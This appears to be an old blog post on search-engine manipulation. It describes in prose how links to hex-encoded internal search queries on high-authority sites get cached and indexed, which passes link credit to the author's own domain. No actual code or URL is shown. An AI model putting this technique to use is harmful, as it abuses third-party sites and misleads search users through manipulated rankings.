Search Engines such as Google have implemented a number of citation based criteria into their algorithms over the past year. Examples include references to academic whitepapers like Hilltop. Although citation engines are a good starting point for quality search results it is apparent that the citation nature of Google and the search functions/caching of large prominent authority sites can in fact be exploited.
Here is an example:
- A series of pages are created on a domain say www.mylittlewebsite.com and the links point to a search request on one of these sites, example: copy the link url and paste to see what i mean, it's loooong
- Notice the formatting using HEX code when surrounded by a standard HREF tag this translates the link properly when the request is made to the authority websites POST for search – the result is properly translated into basic html. This is a clever coding exploit, this format ensures the request is properly formatted in basic HTML.
- Obviously the request is a negative search result on the authority website, however particularly site searches will cache all results of local searches, successful or otherwise.
- If these search results are spiderable content, then a robot such as Googlebot will view the cache results and see inbound links from a high profile authority site point to the domain in question.
- The result: www.mylittlewebsite.com jumps in the rankings.
Now how long will it take Google to patch the hole in their algorithm? Not long I would guess.